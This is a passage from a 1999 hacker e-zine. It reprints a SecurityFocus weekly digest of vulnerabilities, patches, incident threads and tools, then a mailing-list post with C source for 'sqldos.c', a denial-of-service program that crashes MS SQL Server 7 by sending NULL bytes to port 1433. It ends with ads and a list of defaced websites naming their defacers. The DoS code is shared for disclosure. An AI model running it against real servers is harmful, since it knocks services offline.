      Relevant URL:
      http://www.securityfocus.com/bid/815
      Summary:
      
      A vulnerability in the method IE5 uses to process XML data may allow a
      malicious web site owner to read files on a visiting user's computer. A
      web page may be created that contains an XML object type that contains
      instructions to read known files on a visitor's local host (and or
      domain). The IE5 client will allow the XML redirect to access files within
      its own domain.
      
      3. Sun Java IDE Webserver IP Restriction Failure Vulnerability
      BugTraq ID: 816
      Remote: Yes
      Date Published: 1999-11-23
      Relevant URL:
      http://www.securityfocus.com/bid/816
      Summary:
      
      These Java development applications include an http server for testing
      purposes. The server can be configured to only respond to requests from
      certain IP addresses, however the mechanism fails and any requests
      received are serviced. The server will allow read access to any file on
      the filesystem that it haas access to, all the way up to the root
      directory. In the Netbeans product, this is the default 'out of the box'
      configuration. In the Forte product. IP addresses must be added manually
      to a list of permitted clients. Once a single IP address is added, any
      requests regardless of source are responded to.
      
      4. Vermillion FTPd CWD DoS Vulnerability
      BugTraq ID: 818
      Remote: Yes
      Date Published: 1999-11-22
      Relevant URL:
      http://www.securityfocus.com/bid/818
      Summary:
      
      If the Vermillion FTP Daemon (VFTPD) receives three consecutive CWD
      commands with arguments of 504 characters or longer, it will crash.
      
      5. Mdaemon WebConfig Overflow DoS Vulnerability
      BugTraq ID: 820
      Remote: Unknown
      Date Published: 1999-11-24
      Relevant URL:
      http://www.securityfocus.com/bid/820
      Summary:
      
      The Mdaemon mail server for Windows includes a small web server for
      web-based remote administration. This webserver is vulnerable due to an
      unchecked buffer that handles incoming GET requests. An abnormally large
      URL sent to the WebConfig service at port 2002 will crash the service.
      
      6. Cabletron SSR ARP Flood DoS Vulnerability
      BugTraq ID: 821
      Remote: Yes
      Date Published: 1999-11-24
      Relevant URL:
      http://www.securityfocus.com/bid/821
      Summary:
      
      The Cabletron SmartSwitch Router 8000 with firmware revision 2.x has been
      shown to susceptible to a denial of service attack. The SSR can only
      handle approximately 200 ARP requests per second. If an attacker can get
      ICMP traffic to the router, they can flood it with ARP requests,
      effectively shutting the router down for the duration of the attack.
      
      7. Netscape Navigator Long ASP Argument Vulnerability
      BugTraq ID: 822
      Remote: Yes
      Date Published: 1999-11-26
      Relevant URL:
      http://www.securityfocus.com/bid/822
      Summary:
      
      Netscape Communicator 4.7 has been shown to crash when an argument of 800
      characters is supplied to a command in an asp page. Some of the data
      passed as the argument makes it into the EIP and EBP registers, so
      execution of arbitrary code is a possibility. The overflow could be
      embedded in a link on a webpage or in an email message for remote attacks.
      
      8. Deerfield WorldClient Long URL DoS Vulnerability
      BugTraq ID: 823
      Remote: Yes
      Date Published: 1999-11-26
      Relevant URL:
      http://www.securityfocus.com/bid/823
      Summary:
      
      Deerfield's WorldClient is an email webserver that allows it's users to
      retrieve email via HTTP.  It is susceptible to denial of service attacks
      due to an unchecked buffer in the request handler. Supplying a long url
      will crash the server.
      
      9. SCO Xsco Buffer Overflow Vulnerability
      BugTraq ID: 824
      Remote: No
      Date Published: 1999-11-25
      Relevant URL:
      http://www.securityfocus.com/bid/824
      Summary:
      
      Under certain versions of Unixware, the SUID program Xsco is vulnerable to
      a buffer overflow attack. The problem lies in that Xsco does not sanity
      check user supplied data.
      
      10. SCO xlock(1) (long username) Buffer Overflow Vulnerability
      BugTraq ID: 825
      Remote: No
      Date Published: 1999-11-25
      Relevant URL:
      http://www.securityfocus.com/bid/825
      Summary:
      
      Certain versions of Unixware ship with a version of xlock which is
      vulnerable to a buffer overflow attack. The xlock(1) program locks the
      local X display until a username and password are entered. In this
      instance a user can provide an overly long username and overflow a buffer
      in xlock(1). Given that xlock(1) runs SUID root this will result in a root
      compromise.
      
      11. SCO su(1) Buffer Overflow Vulnerability
      BugTraq ID: 826
      Remote: No
      Date Published: 1999-11-25
      Relevant URL:
      http://www.securityfocus.com/bid/826
      Summary:
      
      Certain versions of Unixware ship with a version of su(1) which is
      vulnerable to a buffer overflow attack. This attack is possible because
      su(1) fails to sanity check user supplied data, in this instance a
      username supplied on the command line. Because su(1) is SUID root this
      attack may result in root privileges.
      
      
      III. PATCH UPDATES 1999-11-21 to 1999-11-27
      -------------------------------------------
      
      
      1. Vendor: Red Hat
      Product: RedHat Linux
      Patch Location:
      Red Hat Linux 4.x:
      
       Intel:
      ftp://updates.redhat.com/4.2/i386/sysklogd-1.3.31-0.5.i386.rpm
        ftp://updates.redhat.com/4.2/i386/libc-5.3.12-18.5.i386.rpm
        ftp://updates.redhat.com/4.2/i386/libc-debug-5.3.12-18.5.i386.rpm
      ftp://updates.redhat.com/4.2/i386/libc-devel-5.3.12-18.5.i386.rpm
      ftp://updates.redhat.com/4.2/i386/libc-profile-5.3.12-18.5.i386.rpm
      ftp://updates.redhat.com/4.2/i386/libc-static-5.3.12-18.5.i386.rpm
      
       Alpha:
      ftp://updates.redhat.com/4.2/alpha/sysklogd-1.3.31-0.5.alpha.rpm
      
       Sparc:
      ftp://updates.redhat.com/4.2/sparc/sysklogd-1.3.31-0.5.sparc.rpm
      ftp://updates.redhat.com/4.2/sparc/libc-5.3.12-18.5.sparc.rpm
      ftp://updates.redhat.com/4.2/sparc/libc-debug-5.3.12-18.5.sparc.rpm
      ftp://updates.redhat.com/4.2/sparc/libc-devel-5.3.12-18.5.sparc.rpm
      ftp://updates.redhat.com/4.2/sparc/libc-profile-5.3.12-18.5.sparc.rpm
      ftp://updates.redhat.com/4.2/sparc/libc-static-5.3.12-18.5.sparc.rpm
      
       Source packages:
      ftp://updates.redhat.com/4.2/SRPMS/sysklogd-1.3.31-0.5.src.rpm
      ftp://updates.redhat.com/4.2/SRPMS/libc-5.3.12-18.5.src.rpm
      
       Red Hat Linux 5.x:
      
       Intel:
      ftp://updates.redhat.com/5.2/i386/sysklogd-1.3.31-1.5.i386.rpm
      
       Alpha:
      ftp://updates.redhat.com/5.2/alpha/sysklogd-1.3.31-1.5.alpha.rpm
      
       Sparc:
      ftp://updates.redhat.com/5.2/sparc/sysklogd-1.3.31-1.5.sparc.rpm
      
       Source packages:
      ftp://updates.redhat.com/5.2/SRPMS/sysklogd-1.3.31-1.5.src.rpm
      
       Red Hat Linux 6.0:
      
       Intel:
      ftp://updates.redhat.com/6.0/i386/sysklogd-1.3.31-14.i386.rpm
      
      
       Alpha:
      ftp://updates.redhat.com/6.0/alpha/sysklogd-1.3.31-14.alpha.rpm
      
       Sparc:
      ftp://updates.redhat.com/6.0/sparc/sysklogd-1.3.31-14.sparc.rpm
      
       Source packages:
      ftp://updates.redhat.com/6.0/SRPMS/sysklogd-1.3.31-14.src.rpm
      
       Red Hat Linux 6.1:
      
       Intel:
      ftp://updates.redhat.com/6.1/i386/sysklogd-1.3.31-14.i386.rpm
      
       Source packages:
      ftp://updates.redhat.com/6.1/SRPMS/sysklogd-1.3.31-14.src.rpm
      
      The following patches are for Cobalt Networks RAQ and Qube servers which run RedHat Linux:
      
       RPMS:
       -RaQ3-
      ftp://ftp.cobaltnet.com/pub/experimental/security/i386/sysklogd-1.3.33-9C1.i386.rpm
       -RaQ1 RaQ2 Qube1 Qube2-
      ftp://ftp.cobaltnet.com/pub/experimental/security/mips/sysklogd-1.3.33-9C2.mips.rpm
      
       SRPMS:
      ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/sysklogd-1.3.33-9C1.src.rpm
      ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/sysklogd-1.3.33-9C2.src.rpm
      
      Vulnerability Patched: Linux syslogd Denial of Service Vulnerability
      BugTraq ID:  809
      Relevant URLS:
      http://www.securityfocus.com/bid/809
      
      2. Vendor: Sun Mircosystems
      Product: Solaris 7
      Patch Location:
      
      http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-patches
      Vulnerability Patched: Solaris rpc.ttdbserver Denial of Service Vulnerability
      BugTraq ID: 811
      Relevant URLS:
      http://www.securityfocus.com/bid/811
      
      3. Vendor: Cabletron
      Product: Cabletron SmartSwitch Router 8000 firmware 2.x
      Patch Location:
      http://www.cabletron.com/download/download.cgi?lib=ssr
      Vulnerability Patched: Cabletron SSR ARP Flood DoS Vulnerability
      BugTraq ID: 821
      Relevant URLS:
      http://www.securityfocus.com/bid/821
      
      4. Vendor: SCO
      Product: Unixware
      Patch Location:
      
      Anonymous ftp (World Wide Web URL):
      
      ftp://ftp.sco.COM/SSE/sse039.ltr (cover letter, ASCII text)
        ftp://ftp.sco.COM/SSE/sse039.tar.Z (new binaries, compressed tar
        file)
      
      Compuserve:
      
       GO SCOFORUM, and search Library 11 (SLS/SSE Files) for these
       filenames:
      
       SSE039.LTR (cover letter, ASCII text)
       SSE039.TAZ (new binaries, compressed tar file)
      
      Vulnerability Patched: SCO su(1) Buffer Overflow Vulnerability
      BugTraq ID: 826
      Relevant URLS:
      http://www.sco.com/support/ftplists/index.html
      http://www.securityfocus.com/bid/
      
      5. Vendor: Caldera
      Product: Caldera OpenLinux (and its other distributions)
      Patch Location:
      ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current/RPMS/
      Vulnerability Patched:  Pine Environment Variable Expansion in URLS Vulnerability
      BugTraq ID: 810
      Relevant URLS:
      http://www.securityfocus.com/bid/810
      
      INCIDENTS SUMMARY 1999-11-21 to 1999-11-27
      ------------------------------------------
      
      1. Re: Port 137 and snmp scans (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.LNX.4.10.9911220749020.615-100000@epr0.org
      
      2. SunOS rpcbind scans (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=XFMail.991122220828.ldavis@fastq.com
      
      3. Re: cracker probing 1542 (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991122172139.12644.qmail@securityfocus.com
      
      4. Re: rpc logging (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991122224453.1743.qmail@securityfocus.com
      
      5. SANS and CERT ICMP advisories (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991123051240.12076.qmail@securityfocus.com
      
      6. Fw: unsolicited connection(s) (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=01aa01bf3599$17618a40$30a238cd@bbn.com
      
      7. F5's 3DNS signature + Cisco Distrib Dir (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991124021152.13054.qmail@securityfocus.com
      
      8. Insane amount of probes from 216.212.in-addr.arpa (tin.it) (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.LNX.4.05.9911250211030.30972-100000@bean.xtdnet.nl
      
      9. BIND Scanning (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.SOL.4.10.9911251135010.20417-100000@yuma.Princeton.EDU
      
      10. sweep (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991125164633.23732.qmail@securityfocus.com
      
      11. pop3/imap crawler.. (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991126132342.G28629@obfuscation.org
      
      12. UK Law & Cases Re Malicious action/attacks (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=004f01bf3810$414d9960$050010ac@xtranet.co.uk
      
      13. cgi attack
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=383F9790.150177EB@eti.cc.hun.edu.tr
      
      14. Re: problems from ip69.net247221.cr.sk.ca[24.72.21.69] (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=3841bb7e.1d7.0@infolink.com.br
      
      15. Port 98 scans & new 3128/8080 scans
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=14401.22457.121945.823373@cap-ferrat.albourne.com
      
      
      V. VULN-DEV RESEARCH LIST SUMMARY 1999-11-21 to 1999-11-27
      ----------------------------------------------------------
      
      1. Re: icq accounts (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=19991122182152.P26100@willamette.edu
      
      2. Re: WordPad/riched20.dll buffer overflow (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=18692.991122@iname.com
      
      3. SSH exploit (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=383C072F.408BE3FC@core-sdi.com
      
      4. lanma256.bmp/lanmannt.bmp security risk? (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=3EE01C3AD21BD211B73C0008C72833F9582BA0@exchange.ls.se
      
      5. Re: development of wordpad exploit (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=19991122121349.4947.qmail@home1.gmx.net
      
      
      VI.  SECURITY JOBS SUMMARY 1999-11-21 to 1999-11-27
      ---------------------------------------------------
      
      1. SecurityFocus.com is looking for staff writers for a Windows NT column!
      Reply to: Alfred Huger 
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=Pine.GSO.4.10.9911231458200.4263-100000@www.securityfocus.com
      
      2. NYC - Internet Security Position
      Reply to: timoe@interworld.com
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=19991124200337.15430.qmail@securityfocus.com
      
      3. Security Research Engineer
      Reply to: Samuel Cure 
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=19991124201148.15891.qmail@securityfocus.com
      
      
      VII.  SECURITY SURVEY 1999-11-15 to 1999-11-27
      ----------------------------------------------
      
      The question for 1999-11-15 to 1999-11-27 was:
      
      Which Security conference do you think is more useful to attendees? (Bang
      for your buck)
      
      SANS 31% / 30 votes 
      BlackHat 15% / 15 votes 
      TISC 4% / 4 votes 
      CSI 5% / 5 votes 
      Chaos Communications Congress 6% / 6 votes 
      Defcon 30% / 29 votes 
      
      Total number of votes: 94 votes
      
      
      VIII.  SECURITY FOCUS TOP 6 TOOLS 1999-11-21 to 1999-11-27
      --------------------------------------------------------
      
      1. SecurityFocus.com Pager
      by SecurityFocus.com
      URL: http://www.securityfocus.com/pager/sf_pgr20.zip
      Platforms: Win95/98/NT
      Number of downloads: 1690
      
      This program allows the user to monitor additions to the Security Focus
      website without constantly maintaining an open browser. Sitting quietly in
      the background, it polls the website at a user-specified interval and
      alerts the user via a blinking icon in the system tray, a popup message or
      both (also user-configurable).
      
      2. Lookout
      by Dragonmount Networks
      URL: http://www.dragonmount.net/software/lookout/
      Platforms: Windows 2000, Windows 95/98 and Windows NT
      Number of downloads: 1222
      
      Lookout provides raw access to data sent over a TCP connection, allowing
      the inspection of protocols and the testing of buffers. Lookout connects
      to a foreign host's port and allows you to communicates with the host.
      Alternatively,Lookout can listen on a port and wait for another host to
      connect. Lookout can send variable length strings to test buffers easily.
      
      3. cgicheck99 0.4
      by deepquest
      URL: http://www.deepquest.pf/
      
      Platforms: BSDI, BeOS, DOS, FreeBSD, HP-UX, IRIX, Linux, MacOS, NetBSD,
      OS/2, OpenBSD, OpenVMS, PalmOS, Solaris, SunOS, UNIX, Windows 2000,
      Windows 3.x, Windows 95/98, Windows CE and Windows NT Number of downloads:
      1079
      
      This is one of the worlds most cross platform cgi scanners, running on 37
      operating systems! Even Palmos soon! Will check for 119 of common cgi and
      other remote issues. Plus it will report you the Bugtraq ID of some
      vulnerabilities. Get the rebol interpreter at http://www.rebol.com.
      
      
      4. HookProtect
      by ANNA Ltd., pcihprot@anna.zaporizhzhe.ua
      URL: http://www.geocities.com/SiliconValley/Hills/8839/index.html
      Platforms: Windows 95/98 and Windows NT
      Number of downloads: 777
      
      HookProtect version 2.05 is an another powerful product of PCinvestigator
      series. It is specialized on detecting the programs that infringe the
      privacy and confidentiality on personal computers. There are many various
      types of such programs: keyloggers, interceptors, spies, Trojans and so
      on. Their main function is monitoring of some kind of user's activity on a
      computer (for example, typing the text, running the applications, opening
      the windows, Internet activity, etc.).
      
      5. Pandora for Linux v4 beta 2
      by Nomad Mobile Research Centre
      URL: http://www.nmrc.org/pandora
       Platforms: Linux
      Number of downloads: 693
      
      BETA - Online point and click auditing of Novell Netware from Windows NT.
      Currently spoofing works but lots of crashes on SP3 (we're working on it).
      Attach to server with password hashes extracted from Offline program.
      Search for target servers. Attach to a server and grab user accounts
      without logging in. Dictionary attack against user account. Multiple
      Denial of Service attacks. Improved spoofing and hijacking by using
      realtime sniffing. Works against Netware 4 and 5.
      
      6. Sun Enterprise Network Security Service Early Access 1
      by Sun Microsystems
      URL: http://www.sun.com/software/communitysource/senss/
      Platforms: Java
      Number of downloads: 637
      
      Sun Enterprise Network Security Service (SENSS) is a flexible, Java-based
      security solution: a tool that enables organizations to audit and secure
      their systems and networks in a modern, heterogeneous, corporate intranet.
      
      The SENSS software is not yet complete; this is the Early Access 1
      release, made available for the benefit of parties with a professional
      interest in network security, for their experimentation and comment.
      
      The source code is licensed under the Sun Community Source-Code License,
      consistent with the Sun Community Source License principles.
      
      
      IX. SPONSOR INFORMATION -
      ------------------------------------------
      
      URL: http://www.core-sdi.com
      
      CORE SDI is an international computer security research and development
      company. It's clients include 3 of the Big 5 chartered accountant firms
      for whom CORE SDI develops customized security auditing tools as well as
      several notable computer security product vendors, such as Network
      Associates. CORE SDI also has extensive experiance dealing with financial
      and government contracts through out Latin and North America.
      
      X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
      -------------------------------------
      
      1.  How do I subscribe?
      
        Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body
      of:
      
        SUBSCRIBE SF-NEWS Lastname, Firstname
      
        You will receive a confirmation request message to which you will have
      to anwser.
      
      2.  How do I unsubscribe?
      
        Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed
      address with a message body of:
      
        UNSUBSCRIBE SF-NEWS
      
        If your email address has changed email aleph1@securityfocus.com and I
      will manualy remove you.
      
      3.  How do I disable mail delivery temporarily?
      
        If you will are simply going in vacation you can turn off mail delivery
      without unsubscribing by sending LISTSERV the command:
      
        SET SF-NEWS NOMAIL
      
        To turn back on e-mail delivery use the command:
      
        SET SF-NEWS MAIL
      
      4.  Is the list available in a digest format?
      
        Yes. The digest generated once a day.
      
      5.  How do I subscribe to the digest?
      
        To subscribe to the digest join the list normally (see section 0.2.1)
      and then send a message to LISTSERV@SECURITYFOCUS.COM with with a message
      body of:
      
        SET SF-NEWS DIGEST
      
      6. How do I unsubscribe from the digest?
      
        To turn the digest off send a message to LISTSERV with a message body
      of:
      
        SET SF-NEWS NODIGEST
      
        If you want to unsubscribe from the list completely follow the
      instructions of section 0.2.2 next.
      
      7. I seem to not be able to unsubscribe. What is going on?
      
        You are probably subscribed from a different address than that from
      which you are sending commands to LISTSERV from. Either send email from
      the appropiate address or email the moderator to be unsubscribed manually.
      
      
      
      Alfred Huger
      VP of Engineering
      SecurityFocus.com
      
      @HWA      
      
28.0  SQL 7 "Magic Packet" DoS
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      From NTSecurity list
      
      Kevork Belian discovered this on Dec. 1.  I have been working with his code
      trying to replicate the results but have yet to be successful.  This does
      not
      mean that Kevork's findings are incorrect, it just means that I need to do
      more testing.
      
      I don't believe in holding information back from the mailing list so here
      are the complete details as received from Kevork.  Including his code.
      
      This was tested on SQL 7.00.699
      
      MS SQL Server TCP/IP net library must be enabled.  Sending more than 3 NULL
      bytes in the TCP data can crash the SQL Server.  MS SQL listens on TCP port
      1433.  If this attack is successful you will see an event 17055 in your log
      and you will have to reboot to restore service.
      
      It has been suggested that a solution would be to block incoming traffic on
      port 1433 or disable the TCP/IP net library.  Of course this could have an
      impact on the functionality of the product.  It would be preferable to have
      a MS hotfix for this issue.  Microsoft has been notified and are working on
      the situation themselves.
      
      It is unknown at this time if this attack is actually being carried out.
      
      ============ original text from Kevork Belian========
      
      Description:
      MS SQL Server 7.0 silently crashes when sent a TCP packet containing more
      than 2 NULLs as data.
      I tested this on machines running SQL Server version 7.00.699 (SP 1). The NT
      box is running NT Server with SP 4 (I don't think the Service Pack is an
      issue since NT is not affected).
      If the TCP/IP net library is enabled, the 3 or greater NULL bytes crash SQL
      Server listening on port 1433. The SQL server raises an event 17055 with
      fatal exception EXCEPTION_ACCESS VIOLATION.
      
      I have noticed that you might experience a situation when the SQL Server
      won't crash at first; keep  resending the packet until it crashes
      (hopefully).
      
      It puzzles me why other people weren't able to reproduce it. Is it a
      misconfiguartion issue (I seriosly doubt it).
      
      thanks
      
      Kevork Belian
      
      ========end text=========
      
      ====begin script from Kevork Belian=====
      
      /*
      ** sqldos.c -- a DoS attack agains MS SQL Server
      */
      
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      
      #define PORT 1433    /* the port SQL Server listens on */
      
      
      int main(int argc, char *argv[])
      {
          int sockfd, numbytes;
          struct hostent *he;
          char buff[65535];
          struct sockaddr_in target_addr;
      
          if (argc != 2) {
              fprintf(stderr,"Usage: sqldos target\n");
              exit(1);
          }
      
          if ((he=gethostbyname(argv[1])) == NULL)
      
              perror("gethostbyname");
              exit(1);
          }
      
          if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
              perror("socket error");
              exit(1);
          }
      
          target_addr.sin_family = AF_INET;
          target_addr.sin_port = htons(PORT);
          target_addr.sin_addr = *((struct in_addr *)he->h_addr);
          bzero(&(target_addr.sin_zero), 8);
      
          if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct
      sockaddr)) == -1) {
              perror("connect error");
              exit(1);
          }
          memset(&buff, 0, 3);
      
          if ((numbytes=send(sockfd, buff, 14, 0)) == -1) {
              perror("send errot");
              exit(1);
          }
          close(sockfd);
      
          return 0;
      }
      
      =======end script=========
      
      Of course credit has to go to Kevork Belian as he made the discovery.  I
      would be interested to hear if anyone else can replicate this.
      
      Regards;
      
      
      Steve Manzuik
      Moderator
      Win2K Security Advice
      
      _____________________________________________________________________
      ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
      ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
      SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
      
      @HWA      
      

      
      -=----------=-         -=----------=-        -=----------=-       -=----------=- 
                                           
                                             0                                     
                                             0                                     
                                             0
                                             o
                                           O O O   
                                             0
                                                                     
                                                                                  
      =----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
      
      =----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
     
     
         



     
     
     
     
     
AD.S  ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                              _                _   _     _
                     /\      | |              | | (_)   (_)
                    /  \   __| |_   _____ _ __| |_ _ ___ _ _ __   __ _
                   / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
                  / ____ \ (_| |\ V /  __/ |  | |_| \__ \ | | | | (_| |
                 /_/    \_\__,_| \_/ \___|_|   \__|_|___/_|_| |_|\__, |
                                                                  __/ |
                                                                 |___/
                                                                 
                                                                 
       ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE                                                                  

      
      
       *****************************************************************************
       *                                                                           *
       *           ATTRITION.ORG     http://www.attrition.org                      *
       *           ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
       *           ATTRITION.ORG     DoS Database, Crypto Archive                  *
       *           ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
       *                                                                           *
       *****************************************************************************      
              
 
 
       When people ask you "Who is Kevin Mitnick?" do you have an answer? 
 
       www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
       m www.2600.com ########################################ww.2600.com www.freeke
       vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
       com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
       kevin.com www.k#             FREE EVIN!              #in.com www.kevinmitnic
       k.com www.2600.########################################om www.2600.com www.fre
       ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
       k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

       http://www.2600.com/  http://www.kevinmitnick.com
       
       
       +-----------------------------------------------------------------------------+
       | SmoG Alert ..           http://smog.cjb.net/        NEWS on SCIENCE         |
       | ===================     http://smog.cjb.net/        NEWS on SECURITY        |
       | NEWS/NEWS/NEWS/NEWS     http://smog.cjb.net/        NEWS on THE NET         |
       |                         http://smog.cjb.net/        NEWS on TECHNOLOGY      |
       +-----------------------------------------------------------------------------+
       
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
       *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
       *  http://www.csoft.net" One of our sponsers, visit them now  www.csoft.net   * 
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
       * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


         //////////////////////////////////////////////////////////////////////////////
        //  To place an ad in this section simply type it up and email it to        //
       //        hwa@press,usmc.net, put AD! in the subject header please. - Ed    //
      //     or cruciphux@dok.org                                                 //
      //////////////////////////////////////////////////////////////////////////////


     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Don't worry. worry a *lot*
     
      Send in submissions for this section please! ............c'mon, you KNOW you
      wanna...yeah you do...make it fresh and new...be famous... 
      
      
      
       
       
 SITE.1   
          
            
      You can Send in submissions for this section too if you've found 
      (or RUN) a cool site...
       
        
       
      @HWA
       
         
         
  H.W Hacked websites 
     ~~~~~~~~~~~~~~~~
    
                    ___|                  _ \               |
                   |      __| _` |\ \  / |   |  __| _ \  _` |
                   |     |   (   | `  <  |   | |    __/ (   |
                  \____|_|  \__,_| _/\_\\___/ _|  \___|\__,_|


      Note: The hacked site reports stay, especially wsith some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

          * Hackers Against Racist Propaganda (See issue #7)

     
      Haven't heard from Catharsys in a while for those following their saga visit
      http://frey.rapidnet.com/~ptah/ for 'the story so far'...
      
      Hacker groups breakdown is available at Attrition.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      check out http://www.attrition.org/mirror/attrition/groups.html to see who
      you are up against. You can often gather intel from IRC as many of these
      groups maintain a presence by having a channel with their group name as the
      channel name, others aren't so obvious but do exist.
      
      >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
      
      
      
      * Info supplied by the attrition.org mailing list.
      
      Listed oldest to most recent...
      
      Defaced domain: sony.com.pa
      Site Title: Sony (Panama) 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/sony.com.pa 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.dellnet.com.br
      Site Title: DellNet 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.dellnet.com.br 
      Defaced by: The Death Knights 
      Operating System: Linux
      
      Defaced domain: www.gateway.com.my
      Site Title: Gateway Malaysia 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.gateway.com.my 
      Defaced by: ieet 
      Operating System: Windows NT
      
      Defaced domain: www.honda.com.kw
      Site Title: Honda Korea 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.honda.com.kw 
      Defaced by: ytcracker 
      Operating System: Linux
      
      Defaced domain: www.pcmac.com
      Site Title: PC Mac Consultants 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.pcmac.com 
      Defaced by: cipher 
      Operating System: Windows NT
      
      Defaced domain: homesandloansinc.com
      Site Title: Homes And Loans Inc. 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/homesandloansinc.com 
      Defaced by: Tranzer 
      Operating System: Windows NT
      
      Defaced domain: www.boobshack.com
      Site Title: Boob Shack 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.boobshack.com 
      Defaced by: naptime 
      Operating System: Linux
      
      Previously Hacked
      Defaced domain: www.whitehousehistory.org
      Site Title: The White House Historical Association 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.whitehousehistory.org 
      Defaced by: Einstein 
      Operating System: Windows NT
      Attrition comment: 2nd time hacked
      
      Defaced domain: www.faculdadesantamarta.br
